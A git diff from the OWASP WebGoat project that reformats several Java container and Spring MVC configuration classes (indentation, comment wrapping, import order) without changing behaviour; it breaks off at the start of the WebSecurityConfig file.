diff --git a/src/main/java/org/owasp/webgoat/container/HammerHead.java b/src/main/java/org/owasp/webgoat/container/HammerHead.java
index b186a1b9f..04fd73ce5 100644
--- a/src/main/java/org/owasp/webgoat/container/HammerHead.java
+++ b/src/main/java/org/owasp/webgoat/container/HammerHead.java
@@ -9,30 +9,29 @@ import org.springframework.web.servlet.ModelAndView;
 
 /**
  * *************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * <p>
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
  * for free software projects.
  *
  * @author Jeff Williams
@@ -45,13 +44,13 @@ import org.springframework.web.servlet.ModelAndView;
 @AllArgsConstructor
 public class HammerHead {
 
-    private final Course course;
+  private final Course course;
 
-    /**
-     * Entry point for WebGoat, redirects to the first lesson found within the course.
-     */
-    @RequestMapping(path = "/attack", method = {RequestMethod.GET, RequestMethod.POST})
-    public ModelAndView attack() {
-        return new ModelAndView("redirect:" + "start.mvc" + course.getFirstLesson().getLink());
-    }
+  /** Entry point for WebGoat, redirects to the first lesson found within the course. */
+  @RequestMapping(
+      path = "/attack",
+      method = {RequestMethod.GET, RequestMethod.POST})
+  public ModelAndView attack() {
+    return new ModelAndView("redirect:" + "start.mvc" + course.getFirstLesson().getLink());
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/LessonDataSource.java b/src/main/java/org/owasp/webgoat/container/LessonDataSource.java
index e386a67ae..c09f69d12 100644
--- a/src/main/java/org/owasp/webgoat/container/LessonDataSource.java
+++ b/src/main/java/org/owasp/webgoat/container/LessonDataSource.java
@@ -1,70 +1,70 @@
 package org.owasp.webgoat.container;
 
-import org.owasp.webgoat.container.lessons.LessonConnectionInvocationHandler;
-import org.springframework.jdbc.datasource.ConnectionProxy;
-
-import javax.sql.DataSource;
 import java.io.PrintWriter;
 import java.lang.reflect.Proxy;
 import java.sql.Connection;
 import java.sql.SQLException;
 import java.sql.SQLFeatureNotSupportedException;
 import java.util.logging.Logger;
+import javax.sql.DataSource;
+import org.owasp.webgoat.container.lessons.LessonConnectionInvocationHandler;
+import org.springframework.jdbc.datasource.ConnectionProxy;
 
 public class LessonDataSource implements DataSource {
 
-    private final DataSource originalDataSource;
+  private final DataSource originalDataSource;
 
-    public LessonDataSource(DataSource dataSource) {
-        this.originalDataSource = dataSource;
-    }
+  public LessonDataSource(DataSource dataSource) {
+    this.originalDataSource = dataSource;
+  }
 
-    @Override
-    public Connection getConnection() throws SQLException {
-        var targetConnection = originalDataSource.getConnection();
-        return (Connection) Proxy.newProxyInstance(
-                ConnectionProxy.class.getClassLoader(),
-                new Class[]{ConnectionProxy.class},
-                new LessonConnectionInvocationHandler(targetConnection));
-    }
+  @Override
+  public Connection getConnection() throws SQLException {
+    var targetConnection = originalDataSource.getConnection();
+    return (Connection)
+        Proxy.newProxyInstance(
+            ConnectionProxy.class.getClassLoader(),
+            new Class[] {ConnectionProxy.class},
+            new LessonConnectionInvocationHandler(targetConnection));
+  }
 
-    @Override
-    public Connection getConnection(String username, String password) throws SQLException {
-        return originalDataSource.getConnection(username, password);
-    }
+  @Override
+  public Connection getConnection(String username, String password) throws SQLException {
+    return originalDataSource.getConnection(username, password);
+  }
 
-    @Override
-    public PrintWriter getLogWriter() throws SQLException {
-        return originalDataSource.getLogWriter();
-    }
+  @Override
+  public PrintWriter getLogWriter() throws SQLException {
+    return originalDataSource.getLogWriter();
+  }
 
-    @Override
-    public void setLogWriter(PrintWriter out) throws SQLException {
-        originalDataSource.setLogWriter(out);
-    }
+  @Override
+  public void setLogWriter(PrintWriter out) throws SQLException {
+    originalDataSource.setLogWriter(out);
+  }
 
-    @Override
-    public void setLoginTimeout(int seconds) throws SQLException {
-        originalDataSource.setLoginTimeout(seconds);
-    }
+  @Override
+  public void setLoginTimeout(int seconds) throws SQLException {
+    originalDataSource.setLoginTimeout(seconds);
+  }
 
-    @Override
-    public int getLoginTimeout() throws SQLException {
-        return originalDataSource.getLoginTimeout();
-    }
+  @Override
+  public int getLoginTimeout() throws SQLException {
+    return originalDataSource.getLoginTimeout();
+  }
 
-    @Override
-    public Logger getParentLogger() throws SQLFeatureNotSupportedException {
-        return originalDataSource.getParentLogger();
-    }
+  @Override
+  public Logger getParentLogger() throws SQLFeatureNotSupportedException {
+    return originalDataSource.getParentLogger();
+  }
 
-    @Override
-    public <T> T unwrap(Class<T> clazz) throws SQLException {
-        return originalDataSource.unwrap(clazz);
-    }
+  @Override
+  public <T> T unwrap(Class<T> clazz) throws SQLException {
+    return originalDataSource.unwrap(clazz);
+  }
 
-    @Override
-    public boolean isWrapperFor(Class<?> clazz) throws SQLException {
-        return originalDataSource.isWrapperFor(clazz);
-    }
+  @Override
+  public boolean isWrapperFor(Class<?> clazz) throws SQLException {
+    return originalDataSource.isWrapperFor(clazz);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/LessonTemplateResolver.java b/src/main/java/org/owasp/webgoat/container/LessonTemplateResolver.java
index 732deb519..cfd569720 100644
--- a/src/main/java/org/owasp/webgoat/container/LessonTemplateResolver.java
+++ b/src/main/java/org/owasp/webgoat/container/LessonTemplateResolver.java
@@ -1,36 +1,41 @@
 /**
  * ************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  *
  * @author WebGoat
  * @version $Id: $Id
  * @since October 28, 2003
  */
-
 package org.owasp.webgoat.container;
 
+import java.io.IOException;
+import java.nio.charset.StandardCharsets;
+import java.util.HashMap;
+import java.util.Map;
+import java.util.Set;
 import lombok.extern.slf4j.Slf4j;
 import org.springframework.core.io.ResourceLoader;
 import org.thymeleaf.IEngineConfiguration;
@@ -38,45 +43,48 @@ import org.thymeleaf.templateresolver.FileTemplateResolver;
 import org.thymeleaf.templateresource.ITemplateResource;
 import org.thymeleaf.templateresource.StringTemplateResource;
 
-import java.io.IOException;
-import java.nio.charset.StandardCharsets;
-import java.util.HashMap;
-import java.util.Map;
-import java.util.Set;
-
 /**
- * Dynamically resolve a lesson. In the html file this can be invoked as:
- *
- * <code>
+ * Dynamically resolve a lesson. In the html file this can be invoked as: <code>
  * <div th:case="true" th:replace="lesson:__${lesson.class.simpleName}__"></div>
  * </code>
- * <p>
- * Thymeleaf will invoke this resolver based on the prefix and this implementation will resolve the html in the plugins directory
+ *
+ * <p>Thymeleaf will invoke this resolver based on the prefix and this implementation will resolve
+ * the html in the plugins directory
  */
 @Slf4j
 public class LessonTemplateResolver extends FileTemplateResolver {
 
-    private static final String PREFIX = "lesson:";
-    private ResourceLoader resourceLoader;
-    private Map<String, byte[]> resources = new HashMap<>();
+  private static final String PREFIX = "lesson:";
+  private ResourceLoader resourceLoader;
+  private Map<String, byte[]> resources = new HashMap<>();
 
-    public LessonTemplateResolver(ResourceLoader resourceLoader) {
-        this.resourceLoader = resourceLoader;
-        setResolvablePatterns(Set.of(PREFIX + "*"));
-    }
+  public LessonTemplateResolver(ResourceLoader resourceLoader) {
+    this.resourceLoader = resourceLoader;
+    setResolvablePatterns(Set.of(PREFIX + "*"));
+  }
 
-    @Override
-    protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) {
-        var templateName = resourceName.substring(PREFIX.length());
-        byte[] resource = resources.get(templateName);
-        if (resource == null) {
-            try {
-                resource = resourceLoader.getResource("classpath:/" + templateName).getInputStream().readAllBytes();
-            } catch (IOException e) {
-                log.error("Unable to find lesson HTML: {}", template);
-            }
-            resources.put(templateName, resource);
-        }
-        return new StringTemplateResource(new String(resource, StandardCharsets.UTF_8));
+  @Override
+  protected ITemplateResource computeTemplateResource(
+      IEngineConfiguration configuration,
+      String ownerTemplate,
+      String template,
+      String resourceName,
+      String characterEncoding,
+      Map<String, Object> templateResolutionAttributes) {
+    var templateName = resourceName.substring(PREFIX.length());
+    byte[] resource = resources.get(templateName);
+    if (resource == null) {
+      try {
+        resource =
+            resourceLoader
+                .getResource("classpath:/" + templateName)
+                .getInputStream()
+                .readAllBytes();
+      } catch (IOException e) {
+        log.error("Unable to find lesson HTML: {}", template);
+      }
+      resources.put(templateName, resource);
     }
+    return new StringTemplateResource(new String(resource, StandardCharsets.UTF_8));
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java b/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
index ad0851aa9..114157a90 100644
--- a/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
+++ b/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
@@ -1,36 +1,40 @@
 /**
  * ************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  *
  * @author WebGoat
  * @version $Id: $Id
  * @since October 28, 2003
  */
-
 package org.owasp.webgoat.container;
 
+import java.io.IOException;
+import java.nio.charset.StandardCharsets;
+import java.util.Map;
+import java.util.Set;
 import lombok.RequiredArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.i18n.Language;
@@ -62,175 +66,195 @@ import org.thymeleaf.templateresolver.ITemplateResolver;
 import org.thymeleaf.templateresource.ITemplateResource;
 import org.thymeleaf.templateresource.StringTemplateResource;
 
-import java.io.IOException;
-import java.nio.charset.StandardCharsets;
-import java.util.Map;
-import java.util.Set;
-
-/**
- * Configuration for Spring MVC
- */
+/** Configuration for Spring MVC */
 @Configuration
 @RequiredArgsConstructor
 @Slf4j
 public class MvcConfiguration implements WebMvcConfigurer {
 
-    private static final String UTF8 = "UTF-8";
+  private static final String UTF8 = "UTF-8";
 
-    private final LessonScanner lessonScanner;
+  private final LessonScanner lessonScanner;
 
-    @Override
-    public void addViewControllers(ViewControllerRegistry registry) {
-        registry.addViewController("/login").setViewName("login");
-        registry.addViewController("/lesson_content").setViewName("lesson_content");
-        registry.addViewController("/start.mvc").setViewName("main_new");
-        registry.addViewController("/scoreboard").setViewName("scoreboard");
-    }
+  @Override
+  public void addViewControllers(ViewControllerRegistry registry) {
+    registry.addViewController("/login").setViewName("login");
+    registry.addViewController("/lesson_content").setViewName("lesson_content");
+    registry.addViewController("/start.mvc").setViewName("main_new");
+    registry.addViewController("/scoreboard").setViewName("scoreboard");
+  }
 
-    @Bean
-    public ViewResolver viewResolver(SpringTemplateEngine thymeleafTemplateEngine) {
-        ThymeleafViewResolver resolver = new ThymeleafViewResolver();
-        resolver.setTemplateEngine(thymeleafTemplateEngine);
-        resolver.setCharacterEncoding(StandardCharsets.UTF_8.displayName());
-        return resolver;
-    }
+  @Bean
+  public ViewResolver viewResolver(SpringTemplateEngine thymeleafTemplateEngine) {
+    ThymeleafViewResolver resolver = new ThymeleafViewResolver();
+    resolver.setTemplateEngine(thymeleafTemplateEngine);
+    resolver.setCharacterEncoding(StandardCharsets.UTF_8.displayName());
+    return resolver;
+  }
 
-    /**
-     * Responsible for loading lesson templates based on Thymeleaf, for example:
-     *
-     * <div th:include="/lessons/spoofcookie/templates/spoofcookieform.html" id="content"></div>
-     */
-    @Bean
-    public ITemplateResolver lessonThymeleafTemplateResolver(ResourceLoader resourceLoader) {
-        var resolver = new FileTemplateResolver() {
-            @Override
-            protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) {
-               try (var is = resourceLoader.getResource("classpath:" + resourceName).getInputStream()) {
-                    return new StringTemplateResource(new String(is.readAllBytes(), StandardCharsets.UTF_8));
-               } catch (IOException e) {
-                   return null;
-               }
+  /**
+   * Responsible for loading lesson templates based on Thymeleaf, for example:
+   *
+   * <p><div th:include="/lessons/spoofcookie/templates/spoofcookieform.html" id="content"></div>
+   */
+  @Bean
+  public ITemplateResolver lessonThymeleafTemplateResolver(ResourceLoader resourceLoader) {
+    var resolver =
+        new FileTemplateResolver() {
+          @Override
+          protected ITemplateResource computeTemplateResource(
+              IEngineConfiguration configuration,
+              String ownerTemplate,
+              String template,
+              String resourceName,
+              String characterEncoding,
+              Map<String, Object> templateResolutionAttributes) {
+            try (var is =
+                resourceLoader.getResource("classpath:" + resourceName).getInputStream()) {
+              return new StringTemplateResource(
+                  new String(is.readAllBytes(), StandardCharsets.UTF_8));
+            } catch (IOException e) {
+              return null;
             }
+          }
         };
-        resolver.setOrder(1);
-        return resolver;
-    }
+    resolver.setOrder(1);
+    return resolver;
+  }
 
-    /**
-     * Loads all normal WebGoat specific Thymeleaf templates
-     */
-    @Bean
-    public ITemplateResolver springThymeleafTemplateResolver(ApplicationContext applicationContext) {
-        SpringResourceTemplateResolver resolver = new SpringResourceTemplateResolver();
-        resolver.setPrefix("classpath:/webgoat/templates/");
-        resolver.setSuffix(".html");
-        resolver.setTemplateMode(TemplateMode.HTML);
-        resolver.setOrder(2);
-        resolver.setCharacterEncoding(UTF8);
-        resolver.setApplicationContext(applicationContext);
-        return resolver;
-    }
+  /** Loads all normal WebGoat specific Thymeleaf templates */
+  @Bean
+  public ITemplateResolver springThymeleafTemplateResolver(ApplicationContext applicationContext) {
+    SpringResourceTemplateResolver resolver = new SpringResourceTemplateResolver();
+    resolver.setPrefix("classpath:/webgoat/templates/");
+    resolver.setSuffix(".html");
+    resolver.setTemplateMode(TemplateMode.HTML);
+    resolver.setOrder(2);
+    resolver.setCharacterEncoding(UTF8);
+    resolver.setApplicationContext(applicationContext);
+    return resolver;
+  }
 
-    /**
-     * Loads the html for the complete lesson, see lesson_content.html
-     */
-    @Bean
-    public LessonTemplateResolver lessonTemplateResolver(ResourceLoader resourceLoader) {
-        LessonTemplateResolver resolver = new LessonTemplateResolver(resourceLoader);
-        resolver.setOrder(0);
-        resolver.setCacheable(false);
-        resolver.setCharacterEncoding(UTF8);
-        return resolver;
-    }
+  /** Loads the html for the complete lesson, see lesson_content.html */
+  @Bean
+  public LessonTemplateResolver lessonTemplateResolver(ResourceLoader resourceLoader) {
+    LessonTemplateResolver resolver = new LessonTemplateResolver(resourceLoader);
+    resolver.setOrder(0);
+    resolver.setCacheable(false);
+    resolver.setCharacterEncoding(UTF8);
+    return resolver;
+  }
 
-    /**
-     * Loads the lesson asciidoc.
-     */
-    @Bean
-    public AsciiDoctorTemplateResolver asciiDoctorTemplateResolver(Language language, ResourceLoader resourceLoader) {
-        log.debug("template locale {}", language);
-        AsciiDoctorTemplateResolver resolver = new AsciiDoctorTemplateResolver(language, resourceLoader);
-        resolver.setCacheable(false);
-        resolver.setOrder(1);
-        resolver.setCharacterEncoding(UTF8);
-        return resolver;
-    }
+  /** Loads the lesson asciidoc. */
+  @Bean
+  public AsciiDoctorTemplateResolver asciiDoctorTemplateResolver(
+      Language language, ResourceLoader resourceLoader) {
+    log.debug("template locale {}", language);
+    AsciiDoctorTemplateResolver resolver =
+        new AsciiDoctorTemplateResolver(language, resourceLoader);
+    resolver.setCacheable(false);
+    resolver.setOrder(1);
+    resolver.setCharacterEncoding(UTF8);
+    return resolver;
+  }
 
-    @Bean
-    public SpringTemplateEngine thymeleafTemplateEngine(ITemplateResolver springThymeleafTemplateResolver,
-                                                        LessonTemplateResolver lessonTemplateResolver,
-                                                        AsciiDoctorTemplateResolver asciiDoctorTemplateResolver,
-                                                        ITemplateResolver lessonThymeleafTemplateResolver) {
-        SpringTemplateEngine engine = new SpringTemplateEngine();
-        engine.setEnableSpringELCompiler(true);
-        engine.addDialect(new SpringSecurityDialect());
-        engine.setTemplateResolvers(
-                Set.of(lessonTemplateResolver, asciiDoctorTemplateResolver, lessonThymeleafTemplateResolver, springThymeleafTemplateResolver));
-        return engine;
-    }
+  @Bean
+  public SpringTemplateEngine thymeleafTemplateEngine(
+      ITemplateResolver springThymeleafTemplateResolver,
+      LessonTemplateResolver lessonTemplateResolver,
+      AsciiDoctorTemplateResolver asciiDoctorTemplateResolver,
+      ITemplateResolver lessonThymeleafTemplateResolver) {
+    SpringTemplateEngine engine = new SpringTemplateEngine();
+    engine.setEnableSpringELCompiler(true);
+    engine.addDialect(new SpringSecurityDialect());
+    engine.setTemplateResolvers(
+        Set.of(
+            lessonTemplateResolver,
+            asciiDoctorTemplateResolver,
+            lessonThymeleafTemplateResolver,
+            springThymeleafTemplateResolver));
+    return engine;
+  }
 
-    @Override
-    public void addResourceHandlers(ResourceHandlerRegistry registry) {
-        //WebGoat internal
-        registry.addResourceHandler("/css/**").addResourceLocations("classpath:/webgoat/static/css/");
-        registry.addResourceHandler("/js/**")
-                .addResourceLocations("classpath:/webgoat/static/js/");
-        registry.addResourceHandler("/plugins/**").addResourceLocations("classpath:/webgoat/static/plugins/");
-        registry.addResourceHandler("/fonts/**").addResourceLocations("classpath:/webgoat/static/fonts/");
+  @Override
+  public void addResourceHandlers(ResourceHandlerRegistry registry) {
+    // WebGoat internal
+    registry.addResourceHandler("/css/**").addResourceLocations("classpath:/webgoat/static/css/");
+    registry.addResourceHandler("/js/**").addResourceLocations("classpath:/webgoat/static/js/");
+    registry
+        .addResourceHandler("/plugins/**")
+        .addResourceLocations("classpath:/webgoat/static/plugins/");
+    registry
+        .addResourceHandler("/fonts/**")
+        .addResourceLocations("classpath:/webgoat/static/fonts/");
 
-        //WebGoat lessons
-        registry.addResourceHandler("/images/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/images/").toArray(String[]::new));
-        registry.addResourceHandler("/lesson_js/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/js/").toArray(String[]::new));
-        registry.addResourceHandler("/lesson_css/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/css/").toArray(String[]::new));
-        registry.addResourceHandler("/lesson_templates/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/templates/").toArray(String[]::new));
-        registry.addResourceHandler("/video/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/video/").toArray(String[]::new));
-    }
+    // WebGoat lessons
+    registry
+        .addResourceHandler("/images/**")
+        .addResourceLocations(
+            lessonScanner.applyPattern("classpath:/lessons/%s/images/").toArray(String[]::new));
+    registry
+        .addResourceHandler("/lesson_js/**")
+        .addResourceLocations(
+            lessonScanner.applyPattern("classpath:/lessons/%s/js/").toArray(String[]::new));
+    registry
+        .addResourceHandler("/lesson_css/**")
+        .addResourceLocations(
+            lessonScanner.applyPattern("classpath:/lessons/%s/css/").toArray(String[]::new));
+    registry
+        .addResourceHandler("/lesson_templates/**")
+        .addResourceLocations(
+            lessonScanner.applyPattern("classpath:/lessons/%s/templates/").toArray(String[]::new));
+    registry
+        .addResourceHandler("/video/**")
+        .addResourceLocations(
+            lessonScanner.applyPattern("classpath:/lessons/%s/video/").toArray(String[]::new));
+  }
 
-    @Bean
-    public PluginMessages pluginMessages(Messages messages, Language language,
-                                         ResourcePatternResolver resourcePatternResolver) {
-        PluginMessages pluginMessages = new PluginMessages(messages, language, resourcePatternResolver);
-        pluginMessages.setDefaultEncoding("UTF-8");
-        pluginMessages.setBasenames("i18n/WebGoatLabels");
-        pluginMessages.setFallbackToSystemLocale(false);
-        return pluginMessages;
-    }
+  @Bean
+  public PluginMessages pluginMessages(
+      Messages messages, Language language, ResourcePatternResolver resourcePatternResolver) {
+    PluginMessages pluginMessages = new PluginMessages(messages, language, resourcePatternResolver);
+    pluginMessages.setDefaultEncoding("UTF-8");
+    pluginMessages.setBasenames("i18n/WebGoatLabels");
+    pluginMessages.setFallbackToSystemLocale(false);
+    return pluginMessages;
+  }
 
-    @Bean
-    public Language language(LocaleResolver localeResolver) {
-        return new Language(localeResolver);
-    }
+  @Bean
+  public Language language(LocaleResolver localeResolver) {
+    return new Language(localeResolver);
+  }
 
-    @Bean
-    public LocaleResolver localeResolver() {
-        SessionLocaleResolver localeResolver = new SessionLocaleResolver();
-        return localeResolver;
-    }
+  @Bean
+  public LocaleResolver localeResolver() {
+    SessionLocaleResolver localeResolver = new SessionLocaleResolver();
+    return localeResolver;
+  }
 
-    @Bean
-    public LocaleChangeInterceptor localeChangeInterceptor() {
-        LocaleChangeInterceptor lci = new LocaleChangeInterceptor();
-        lci.setParamName("lang");
-        return lci;
-    }
+  @Bean
+  public LocaleChangeInterceptor localeChangeInterceptor() {
+    LocaleChangeInterceptor lci = new LocaleChangeInterceptor();
+    lci.setParamName("lang");
+    return lci;
+  }
 
-    @Override
-    public void addInterceptors(InterceptorRegistry registry) {
-        registry.addInterceptor(localeChangeInterceptor());
-    }
+  @Override
+  public void addInterceptors(InterceptorRegistry registry) {
+    registry.addInterceptor(localeChangeInterceptor());
+  }
 
-    @Bean
-    public Messages messageSource(Language language) {
-        Messages messages = new Messages(language);
-        messages.setDefaultEncoding("UTF-8");
-        messages.setBasename("classpath:i18n/messages");
-        messages.setFallbackToSystemLocale(false);
-        return messages;
-    }
-
-    @Bean
-    public LabelDebugger labelDebugger() {
-        return new LabelDebugger();
-    }
+  @Bean
+  public Messages messageSource(Language language) {
+    Messages messages = new Messages(language);
+    messages.setDefaultEncoding("UTF-8");
+    messages.setBasename("classpath:i18n/messages");
+    messages.setFallbackToSystemLocale(false);
+    return messages;
+  }
 
+  @Bean
+  public LabelDebugger labelDebugger() {
+    return new LabelDebugger();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/WebGoat.java b/src/main/java/org/owasp/webgoat/container/WebGoat.java
index b44f4b5e7..e721fddee 100644
--- a/src/main/java/org/owasp/webgoat/container/WebGoat.java
+++ b/src/main/java/org/owasp/webgoat/container/WebGoat.java
@@ -1,36 +1,37 @@
 /**
  * ************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  *
  * @author WebGoat
  * @version $Id: $Id
  * @since October 28, 2003
  */
-
 package org.owasp.webgoat.container;
 
+import java.io.File;
 import org.owasp.webgoat.container.session.UserSessionData;
 import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.beans.factory.annotation.Value;
@@ -43,33 +44,31 @@ import org.springframework.context.annotation.Scope;
 import org.springframework.context.annotation.ScopedProxyMode;
 import org.springframework.web.client.RestTemplate;
 
-import java.io.File;
-
 @Configuration
-@ComponentScan(basePackages = { "org.owasp.webgoat.container", "org.owasp.webgoat.lessons"})
+@ComponentScan(basePackages = {"org.owasp.webgoat.container", "org.owasp.webgoat.lessons"})
 @PropertySource("classpath:application-webgoat.properties")
 @EnableAutoConfiguration
 public class WebGoat {
 
-    @Bean(name = "pluginTargetDirectory")
-    public File pluginTargetDirectory(@Value("${webgoat.user.directory}") final String webgoatHome) {
-        return new File(webgoatHome);
-    }
+  @Bean(name = "pluginTargetDirectory")
+  public File pluginTargetDirectory(@Value("${webgoat.user.directory}") final String webgoatHome) {
+    return new File(webgoatHome);
+  }
 
-    @Bean
-    @Scope(value = "session", proxyMode = ScopedProxyMode.TARGET_CLASS)
-    public WebSession webSession() {
-        return new WebSession();
-    }
+  @Bean
+  @Scope(value = "session", proxyMode = ScopedProxyMode.TARGET_CLASS)
+  public WebSession webSession() {
+    return new WebSession();
+  }
 
-    @Bean
-    @Scope(value = "session", proxyMode = ScopedProxyMode.TARGET_CLASS)
-    public UserSessionData userSessionData() {
-        return new UserSessionData("test", "data");
-    }
+  @Bean
+  @Scope(value = "session", proxyMode = ScopedProxyMode.TARGET_CLASS)
+  public UserSessionData userSessionData() {
+    return new UserSessionData("test", "data");
+  }
 
-    @Bean
-    public RestTemplate restTemplate() {
-        return new RestTemplate();
-    }
+  @Bean
+  public RestTemplate restTemplate() {
+    return new RestTemplate();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/WebSecurityConfig.java b/src/main/java/org/owasp/webgoat/container/WebSecurityConfig.java
index 0339adc35..59084aa2f 100644
--- a/src/main/java/org/owasp/webgoat/container/WebSecurityConfig.java
+++ b/src/main/java/org/owasp/webgoat/container/WebSecurityConfig.java
@@ -2,36 +2,35 @@
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
